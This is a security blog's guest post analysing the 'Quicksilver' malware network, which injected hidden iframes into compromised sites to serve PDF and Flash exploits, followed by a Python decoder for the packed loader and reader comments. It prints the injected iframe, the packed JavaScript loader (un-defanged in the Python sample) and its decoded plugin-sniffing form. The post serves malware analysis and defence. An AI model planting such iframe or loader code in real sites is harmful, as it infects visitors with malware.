
Quicksilver Malware Network

   17 Sep 09   Filed in Website exploits

In my latest post about the iframe attack that used free domains from dynamic DNS hosting providers pointing to a network of compromised dedicated servers, I asked readers for any additional information they had about this attack. A few days later I received this email:

Hi there.

Since this May I have been watching this network (I named it “quicksilver“) after two PCs/users ran into cn-8080-iframe-modified websites. Using only “white hat” instruments (dig, whois, malzilla, VMWare, google and my brain ;) ) I was able to collect information about the basic frame of this network.

It is not a simple botnet – it combines three networks with different functions to form a “malware superstructure”.

Nearly everything in this network is constantly moving (thus the name) and uses compromised machines acting as proxies or slaves. The machines of the real black hats are movable themselves – the older “gumblar” network (which I think is a precursor to quicksilver) used a Ukrainian c&c-server with a different ip address.

At the end of the email, the reader said that he had a chart of this network and asked me if I wanted to take a look at it. The information looked interesting so I asked if he would like to publish it on my blog and got his permission:

you have my explicit permission to publish everything I send you – anonymously. Although I have a name and a title, the only thing relevant is to unmask those networks.

So here it is. I’ve published the story as is. I just added some formatting and converted the chart to GIF format to avoid PDF security concerns.

———————

Quicksilver

A customer called me back in June to complain about his computer acting funny. “Everything feels really slow and some tasks even will fail completely!” – I went to investigate and found one task eating up all the available cpu time. A task called “svchost.exe” with correct description, company name and image path. But it was running under the user's account (which lacks admin privileges).

After killing this process the machine recovers. I logged off and the user logged back on while I pressed and held the “shift”-key (thus suppressing “autostart”). Nothing suspicious happened and I ran Mark’s “Autoruns”. This revealed a program named “rncsys32.exe” sitting in the “Autostart” group – the complete file image, not a link!

Further investigation revealed at least three other malware programs failed to install themselves on the machine because of missing admin privileges. Unfortunately the user deleted his web browser history. He swore that he visited no shady sites and I closed this case.

Back home I started this program in a safe virtual machine – it masks itself by injection into a newly created “svchost” instance and eats up all cpu time – presumably by mistake. It looks for all kinds of configuration files of ftp programs in their default install paths. Gathering ftp accounts was one task of this malware program (McAfee: Generic.dx!hu trojan).

A few weeks later a family member called me. By visiting a certain website his Firefox always completely hung. Two days later Google warned him that this website may harm his computer. Fearing a malware infection he called me for help. Analyzing the suspicious website I found an inserted iframe like this one:

<iframe src="hxxp://shopfilmlifeonline .cn:8080/index.php" width=103 height=173 style="visibility:hidden"></iframe>

I called that URI in a virtual machine and got this:

<html>
<body>
<script>
e val(function(p,a,c,k,e,d){e=function(c){return
c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return
d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new
RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('g 5(){m{l(i=0;i<=8.7.j;i++){2=8.7[i].2;a((2.4("6
k")!=-1)||(2.4("6 r")!=-1)){9.b(\'<3 c="d/p.q"></3>\')}a(2.4("o")!=-1){9.b(\'<3
c="d/n.f"></3>\')}}}h(e){}}5();',28,28,'||name|iframe|indexOf|Fa 5zfha1|Adobe|plugins|navigator|document|if|write|src|cache||swf|function|catch||length|Acrobat|for|try|flash|Flash|readme|pdf|PDF'.split('|'),0,{}))
</script>
</body>
</html>

Now I needed a program for safely running this javascript. After some struggling with Google I finally found Malzilla – an excellent program for analyzing malicious websites. Malzilla runs this script through its decoder and delivers another script:

function Fa5zfha1(){try{for(i=0;i<=navigator.plugins.length;i++){name=navigator.plugins[i].name;if((name.indexOf("Adobe
Acrobat")!=-1)||(name.indexOf("Adobe PDF")!=-1)){d ocument.write('<i frame
src="cache/readme.pdf"></iframe>')}if(name.indexOf("Flash")!=-1){d ocument.write('<iframe
src="cache/flash.swf"></iframe>')}}}catch(e){}}Fa5zfha1();

The malicious hidden iframe uses javascript to look for the installed plugins “Adobe Acrobat“, “Adobe PDF” and “Flash“. It loads either “readme.pdf” or “flash.swf” or both into the browser. After downloading both files and sending them to virustotal.com they are revealed as exploits for older versions of the corresponding plugins (McAfee: Exploit-PDF.b.gen.a and Exploit-CVE2007-0071).

Finally I used a virtual Windows machine with Firefox and an older Flash plugin behind a virtual transparent proxy to analyze the infection. Loading the exploits into a browser with admin privileges leads to multiple malware infections (koobface, cutwail, podmena …) along with one “master trojan”: rncsys32.exe.

My family member was lucky – the exploit was unable to infect his machine. The Adobe plugin on his machine was not old enough (the browser simply stopped working). My customer mentioned above must have crossed some website with the malicious iframe. I had to remove the older Adobe plugin.

After some further study with normal tools like dig, whois and Google this is my picture of the malware network that I named “Quicksilver“:

Quicksilver network (click to enlarge 1680x903)

Quicksilver as it worked in July

  • 100+ domains like “bigbestlite .cn” for minimizing blacklist impact. Their nameservers are ns[1|2].freednshostway.com
  • a small set (4-6) of compromised (web)servers which act as DNS responders or DNS proxies for those domains
  • a large group of compromised web servers serving the malicious iframe
  • a group of compromised (web)servers (active: 5) which act as http-proxies on port 8080
  • a large group of infected windows botnet-drones sending account data (ftp) back to their master
  • a small group of compromised dedicated malware servers contacted by the “master trojan”
  • the c&c server and a kind of “master command list server”.

Over the following weeks I observed that nearly everything in this network changes (DNS servers/proxies, port 8080 web proxies, javascript code, master trojan, exploit versions, exploits, dedicated malware servers …). The only machines which seem to be static are the c&c server and the “master command list server”.

Because of the uploading of (ftp) accounts from the Windows drones, the three main groups are constantly feeding each other and have kept this network running for nearly half a year now.

Empty HTTP responses and nginx gateway timeouts indicated that the network is not running as smoothly as it did back in June. Denis’ post “Dynamic DNS and Botnet of Zombie Web Servers” shows that the network (or a variant) is still out there and is probably looking for other ways to keep alive.

———————
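The packed script in the guest post above uses the well-known eval(function(p,a,c,k,e,d){...}) packer: each \w+ token in the payload is a base-28 number indexing the word list, and empty list slots mean "keep the token". Below is an added example (my own code, not the guest author's or Malzilla's) that applies that dictionary statically with a regex, so the sample is decoded without running any JavaScript; the embedded PACKED string is the page's script re-joined onto one line with the defanging spaces removed.

```python
import re

# Locates the packer's argument list: ('payload', radix, count, 'words'.split('|'), ...)
PACKER_ARGS = re.compile(r"\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,"
                         r"\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)", re.S)
# Digit order the packer's toString(36)/fromCharCode(c+29) encoding produces
DIGITS = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

def decode_index(token, radix):
    """Read a token as the packer's base-<radix> number, or None if it is not one."""
    value = 0
    for ch in token:
        digit = DIGITS.find(ch)
        if digit < 0 or digit >= radix:
            return None  # not a dictionary key: the token stays as written
        value = value * radix + digit
    return value

def unpack(script):
    """Apply the word dictionary to the payload with a regex; no JavaScript is run."""
    m = PACKER_ARGS.search(script)
    if not m:
        raise ValueError("no p,a,c,k,e,d packer call found")
    unescape = lambda s: re.sub(r"\\(.)", r"\1", s)  # resolves \' and \\ in JS literals
    payload, radix, count = unescape(m.group(1)), int(m.group(2)), int(m.group(3))
    words = unescape(m.group(4)).split("|")
    if len(words) != count:
        raise ValueError(f"dictionary has {len(words)} entries, packer claims {count}")
    def lookup(tok):
        idx = decode_index(tok.group(0), radix)
        # empty slots mean "keep the token" (i, e, 0 and 1 in the sample below)
        return words[idx] if idx is not None and idx < count and words[idx] else tok.group(0)
    return re.sub(r"[A-Za-z0-9_]+", lookup, payload)

def iframe_sources(unpacked):
    """Iframe src values the decoded script would write: the exploit files to block/hunt for."""
    return re.findall(r'<iframe\s+src="([^"]+)"', unpacked)

# Constructed input: the packed script quoted in the post, re-joined onto one line with the
# defanging spaces ("e val", "Fa 5zfha1") removed so that the sample parses.
PACKED = (
    "eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String))"
    "{while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];"
    "e=function(){return'\\\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+"
    "'\\\\b','g'),k[c])}}return p}('g 5(){m{l(i=0;i<=8.7.j;i++){2=8.7[i].2;a((2.4(\"6 k\")!=-1)||"
    "(2.4(\"6 r\")!=-1)){9.b(\\'<3 c=\"d/p.q\"></3>\\')}a(2.4(\"o\")!=-1){9.b(\\'<3 c=\"d/n.f\"></3>\\')}}}"
    "h(e){}}5();',28,28,'||name|iframe|indexOf|Fa5zfha1|Adobe|plugins|navigator|document|if|write|"
    "src|cache||swf|function|catch||length|Acrobat|for|try|flash|Flash|readme|pdf|PDF'.split('|'),0,{}))"
)

if __name__ == "__main__":
    print(unpack(PACKED), iframe_sources(unpack(PACKED)), sep="\n")
```

The output matches the decoded script shown in the post, and iframe_sources() yields the two exploit file names (cache/readme.pdf and cache/flash.swf) that a web-server owner can grep access logs and document roots for.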

I guess this story is interesting to both regular web surfers and to security researchers. I’d like to thank my anonymous contributor for such an insightful post and for all the efforts he put into this.

Invitation to contributors

If you have anything that is worth posting here please contact me and I’ll consider publishing it as a guest post.

Reader's Comments (6)

  1.

    Kaspersky already wrote about it

    Edit by Denis: The article is in Russian. It’s a really interesting piece of research into the same iframe attack. Unfortunately I couldn’t find an English version of the article.

  2.

    Hey, Google has a translation for the site: just google the full URL and choose translate.

  3.

    Out of curiosity, do you know about how long Quicksilver has been active?